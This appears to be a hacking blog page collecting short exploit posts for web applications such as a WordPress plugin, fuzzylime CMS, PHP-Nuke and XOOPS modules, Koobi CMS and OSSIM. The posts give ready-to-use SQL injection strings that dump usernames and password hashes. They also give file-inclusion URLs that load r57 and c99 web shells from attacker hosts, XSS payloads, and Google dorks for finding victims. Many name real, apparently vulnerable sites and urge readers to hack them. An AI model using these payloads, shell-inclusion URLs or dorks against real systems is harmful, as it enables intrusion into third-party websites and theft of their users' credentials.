EasyAjax-WP 0.89 Local file include + Dork
###########################################
EasyAjax-WP 0.89 Local file include
vul. script : EasyAjax-WP
version : 0.89
Plugin URI: http://www.getonthenet.eu/wordpress/
Description: This plugin provides a quick and easy way to install and uninstall <a href=”http://www.giannim.com/blog/index.php?page_id=13″>Ajax-WP</a> on your WordPress Blog. A config page is also added to make setting up a breeze.
Discovered by Afshin.M *** WWW.AfshinBlog.wordpress.com
###########################################
Exploit :
http://[TARGET]/[wordpress]/index.php#http%3A%2F%2F[TARGET]%2F| <===> File list
Change http%3A%2F%2F[TARGET]%2F| to another directory.
For example : http://localhost/wordpress/index.php#http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-includes|
** Attention : You must put | end of url **
Note: if you want to include file, dont put %2F end of url.
And if you want too see list of files, you must put %2F …
Dork:
allinurl:”wp-content/plugins/EasyAjax-WP”
allinurl:”ajax-wp.0.85″
allinurl:”EasyAjax-WP.php”
allinurl:”ajax-wp.php”
allinurl:”ajax-wp.js”
Example :
http://www.getonthenet.eu/#http%3A%2F%2Fwww.getonthenet.eu%2Fwp-admin%2F|
OR
http://www.getonthenet.eu/#http%3A%2F%2Fwww.getonthenet.eu%2Fwp-content%2Fplugins%2FEasyAjax-WP%2Fajax-wp.0.85%2Fimages%2Floading.gif|
+===============================================+
discuss your questions in www.afshinblog.wordpress.com
Regard, Afshin.Mehrabany 
fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability + Dork
vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability |
author: irk4z@yahoo.pl
# code:
/code/display.php:
…
1 <?
2 $s = $_GET[s];
3 $p = $_GET[p];
4 $s = str_replace(“../”, “”, $s);
5 $p = str_replace(“../”, “”, $p);
6 if(empty($s)) $s = “front”;
7 if(empty($p)) $p = “index”;
8 $curs = $s;
9 $curp = $p;
10
11 include “code/settings.inc.php”;
12 include “${admindir}/languages/english.inc.php”;
…
line 11: ./code/code/settings.inc.php not exists so $admindir is empty 
:D
Exploit:
http://[TARGET]/[PATH]/code/display.php?admindir=http://afshinblog.110mb.com/r57shell1.35.txt?
Dork: “powered by fuzzylime”
Regard, Afshin.m
EasyGallery <= 5.0tr – Multiple Remote Vulnerabilities + Dork
Welcome,
Exploit: Multiple Remote Vulnerabilities [High] [+] Remote SQL Injection with DORK:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL]
[~] Example: -1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/*
+========================+
[+] Cross Site Scripting in URI:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php/[XSS]
[~] Example: >”><ScRiPt>alert(“JosS)</ScRiPt>
+========================+
[+] Cross Site Scripting:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=[XSS]
[~] Example: %22+onmouseover=alert(“JosS”)+
Dork(s):
allinurl:easygallery/index.php
allinurl:easygallery/index.php
allinurl:EasyGallery
Powered by EasyGallery 5.0
+=======================+
Visit my blog again, i have HOT articles! 
Good luck, Afshin.m
BM Classifieds (listingid),(ad)SQL Injection Vulnerability + Dork
Hi friend,
BM Classifieds (listingid),(ad)SQL Injection Vulnerability
AUTHOR : xcorpitx
Exploit(s) :
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0×3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0×3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Dork(s):
Dork 1 : “showad.php?listingid=”
Dork 2 : “pfriendly.php?ad=”
Example : http://www.njballyhoo.com/
Regard, Afshin.m
A site full of bugs!
Hi all!
Go to this address :
http://go.erestor.net/
You can hack this site easily!
in “http://go.erestor.net/?page=show_user.php” you can “Include” files from server!
in http://go.erestor.net/?page=show_user.php&username=’ you can execute SQL command and enjoy!!!
And here => http://go.erestor.net/?page=welcome.php&msg=%3Cfont%20size=70%3Ehacked??!!%3C/font%3E
This is good example to learn hack.
Try it now!
Good luck, Afshin.m
XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability + Dork
Hi all.
AUTHOR : S@BUN
DORK : allinurl: “modules/glossaires”
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
Example : www.guitargearheads.com
Have a nice day!
Regard, Afshin.m
Mambo Component com_Musica (id) Remote SQL Injection Vulnerability + Dork
Hi friends.
+====================+
Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
Exploit :
index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*
Dork : You can use Dork creator or
allinurl:index.php?option=com_musica
By writing comment, help me to write best article.
Regard, Afshin.m
Fast dork creator – HOT!
hi all.
now you can use the “Dork creator” for create dork and find vulnerable sites, easy! 
Address : http://afshinblog.110mb.com/dork-creator
Fill box and creator dork.
if you have problem, comments help you!
Good luck!
Afshin.m
Koobi CMS 4.3.0 – 4.2.3 (index.php categ) Remote SQL Injection + Dork
Spanish Hackers Team (www.spanish-hackers.com)
Koobi CMS 4.3.0 – 4.2.3 (index.php categ) Remote SQL Injection
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Koobi CMS 4.3.0 – 4.2.3
[~] HomePage: http://www.dream4.de/
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[+] Exploit v4.3.0 – v4.2.4:
[~] Table: koobi4_user
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL]
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,concat(email,0×203a3a20,pass),3+from+koobi4_user/*
[+] Exploit v4.2.3:
[~] Table_ koobi_user
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL]
[~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,concat(email,0×203a3a20,pass),3+from+koobi_user/*
Dork: inurl:index.php?showlink=1&fid=8&p=links&area=1&categ
Good luck!
Afshin.m
SiteBuilderElite1.2 Multiple Remote File Inclusion + Dork
Hi again
all are exploitable by the variable “CarpPath” for example
http://[target]/files/carprss.php?CarpPath=[Evil_Code]
Dork : allinurl:carprss.php (May not work perfectly! 
)
Example:
http://dalzsfo.com/carprss.php?CarpPath=http://www.afshinblog.110mb.com
Good luck!
Hack sites without using CMS.
Hi all.
You can hack many websites with search in google…
Now i say you how you can search some keywords and hack the vulnerable sites without using the CMS vulnerability.
Search in google : allinurl:”?page=login.php”
The result show you vulnerable sites that you can hack sites with “Remote file include”.
You can change the “login.php” to the “evil code” (Sheller) and access to the files.
If you try, you can hack many sites that not using CMS!!!
And you dont need the milw0rm and … for find vulnerable CMS and sites.
This is easy way for hacking.
Examples find by this method:
http://drlorenzana.com/index.php?page=index.php
http://www.redskillz.nl/host/denbrieser69/?page=index.php
http://www.anticoagulation-advisor.com/ckuser.php?page=[EVILCODE]
http://www.babyshopnz.com/index.php?page=../
http://luhribu.com/index.php?page=../
http://www.synergyteamworkout.com/index.php?page=http://www.defcont4.hypersite.com.br/shell/c99.txt
http://www.espace-gratuit.net/page.php?page=[Evilcode]
http://candlphoto.com/index.php?page=http://afshinblog.110mb.com/test.php
& ….
Note:You can find some sheller and evil code in http://afshinblog.110mb.com/
Good luck, Afshin.m
PHP-NUKE Modules NukeC Module’s Version: 2.1 Remote SQL Injection + Dork
PHP-NUKE Modules NukeC Module’s Version: 2.1 Remote SQL Injection
Found: DamaR
contact: By.DamaR@Hotmail.Com
Exploit:
/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
Dork : inurl:”modules.php?name=NukeC”
Example : www.sada.co.z/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
Module Copyright © Information
NukeC module for PHP-Nuke
Module’s Name: NukeC
Module’s Version: 2.1
Module’s Description: NukeC – The Advanced Advertising System for PHP-Nuke.
NukeC Addon Module is addon module built for work on PHP-Nuke, the great web portal system.
NukeC is an advertising system that allows website visitors or members to sell something by posting the information about the item that they want to sell. With the admin sections, you could easily manage all of contents and preferences in NukeC Modules eventhough you are not a PHP programmer.
NukeC 2.1 is only work on PHP-Nuke 6.5. Please Download 2.0 or earlier for PHP-Nuke 6.0 or earlier nuke version
License: GNU/GPL
Author’s Name: Sudirman Angriawan
Author’s Email: nukecpower@yahoo.com
Good luck!
Afshin.m
OSSIM 0.9.9rc5 (XSS/SQL Injection) Multiple Remote Vulnerabilities + Dork
Application: OSSIM
http://www.ossim.net
Version: 0.9.9rc5
Note: it is possible that the problem affects also earlier OSSIM versions
Platforms: Linux
Bug: SQL injection, Cross Site Scripting
Exploitation: remote
Date: 21 Feb 2008
Author: Marcin Kopec
E-mail: marcin(dot)kopec(at)hotmail(dot)com
—————————————
1) Introduction
OSSIM it’s a free implementation of Security Information Management (SIM) system, equipped with many useful security tools (nessus, snort, p0f, ntop, …) managed from easy-to-use web panel.
2) SQL injection
The bug exist in portname parameter of modifyportform.php
It’s possible to obtain hashed administrator password when user have rights to do port modification in “PORTS” tab.
http://[target]/[ossim]/port/modifyportform.php?portname=ANY’%20and%201=2%20union%20select%20pass,2%20from%20ossim.users%20where%20login=’admin
3) XSS
Quotes in OSSIM aren’t property sanitized.
Below XSS may be executed without logging into the OSSIM.
http://[target]/[ossim]/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!–
Dork : inurl:”login.php?dest”
Example : http://www.slooh.com/login.php?dest=%22%3E%3Cscript%3Ealert(%22WwW.AfshinBlog.WordPress.com%22)%3C/script%3E%3C!–
Good luck!
Afshin.m
For webmasters…FREE Email List!
Hi visitors.
Small reward for Afshinblog visitors, FREE Email list!
Good luck!
Afshin.m
PHP-Nuke Module Inhalt (cid) SQL Injection Vulnerability + Dork
Title : Php – Nuke Module Inhalt Sql
Author : Crackers_Child
Mail : Cashr00t@hotmail.com
Dork : allinurl:”modules.php?name=Inhalt”
Exploit :
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2
modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
Greetz: Str0ke , biyofrm.com , indir21.com , sibersavascilar.com , tryag.cc
Regard, Afshin.m
php-nuke modules Docum remote sql injection +Dork
php-nuke modules Docum remote sql inj
Found:DamaR
By.Damar@Hotmail.Com
Hack Bitti ama Dönmek Yakın Since 2000
——————————————————————————-
Dork : allinurl:”modules.php?name=Docum”
/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
Example: http://www.metalthunder.com.ar/mt
Regard, Afshin.m
MultiCart 2.0 Remote Blind SQL Injection Vulnerbility (productdetails.php) + Dork
Hi all.
Vulnerable file :
www.[target]/[MultiCart 2.0]/productdetails.php?productid=[SQL CODE]
Dork : allinurl:”productdetails.php?productid=”
Vulnerable site :
http://www.spaceconnection.org/
Good luck!
Advertise…FREE!
Hi dear,
if you want to have more visitors, I can show your advertise free for 30 day!!!
Write your detail on comments and after 2 day see your advertise on right block.
Start now!
Regard, Afshin.m
